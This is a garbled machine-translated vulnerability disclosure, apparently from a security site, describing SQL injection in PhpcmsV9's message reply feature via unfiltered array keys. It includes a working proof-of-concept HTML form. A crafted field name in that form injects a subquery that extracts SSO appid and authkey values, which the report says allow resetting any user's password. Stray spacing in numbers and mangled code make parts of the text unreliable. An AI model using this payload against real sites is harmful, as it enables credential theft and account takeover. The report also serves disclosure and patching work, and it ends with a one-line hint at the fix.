PhpcmsV9 SQL injection 2 0 1 3-year New Year second-vulnerability warning-the black bar safety net

ID MYHACK58:62201337423
Type myhack58
Reporter 佚名
Modified 2013-02-21T00:00:00


Brief description:

Second, such as about came, Thank you for your attention, the second sent using an unrestricted SQL injection, the final object you can modify any user's password, the recommendations confirm the safety hazard rating of high.

Tomorrow then update the next vulnerability.

Detailed description:

In/phpcms9/phpcms/modules/message/index. php code is as follows:

$messageid = $this->message_db->insert($_POST['info'],true);

the insert method is the key value, the code is as follows:

public function insert($data, $table, $return_insert_id = false, $replace = false) {

if(! is_array( $data ) || $table == " || count($data) == 0) {

return false;


$fielddata = array_keys($data);

$valuedata = array_values($data);

array_walk($fielddata, array($this, 'add_special_char'));

array_walk($valuedata, array($this, 'escape_string'));

$field = implode (',', $fielddata);

$value = implode (',', $valuedata);

$cmd = $replace ? 'REPLACE INTO' : 'INSERT INTO';

$sql = $cmd.' .$ this->config['database']."..$ table." ('.$ field.') VALUES ('.$ value.')';

$return = $this->execute($sql);

return $return_insert_id ? $this->insert_id() : $return;


Well, unfortunately

array_walk($fielddata, array($this, 'add_special_char'));

And not for key to do any filtering, so that the first paragraph of the mentioned code causes a SQL injection vulnerability to: the.

This, for poc, I read my local authkey, then I have can reset any user password, behind the things I don't have a demo.

Vulnerability to prove:

Read the phpsso_server the appid and authkey, then you can call the client. class. in php ps_member_edit function to modify any user password.


The form is as follows: user name or something to give yourself a change.

<form name="myform" action="http://localhost/phpcms9/index.php?m=message&c=index&a=reply" method="post" id="myform">

<table width="1 0 0%" cellspacing="0" class="table_form">



<td><input name="info[subject]" type="text" id="subject" size="3 0" value="Re: hh" class="input-text"/></td>




<td><textarea name="info[content]" id="con" rows="5" cols="5 0"></textarea></td>


<input type="hidden" name="info[replyid]" value="2" />

<input type="hidden" name="info[send_to_id]" value="cc" />

<input type="hidden" name="info[send_from_id]" value="hh">

<!-- Exploits focus in the here - >

<input type="hidden" name="info[status) values ((Select group_concat(appid,CHAR(4 2),authkey) from v9_sso_applications),1,1,1,CHAR(1 0 4, 1 0 4),1)#]" value="cc" />

<!-- Exploits focus ends here -->



<td><input name="code" type="text" id="code" size="1 0" class="input-text"/> <img id='code_img' ));

In add_special_char function within the key to do filtering on it.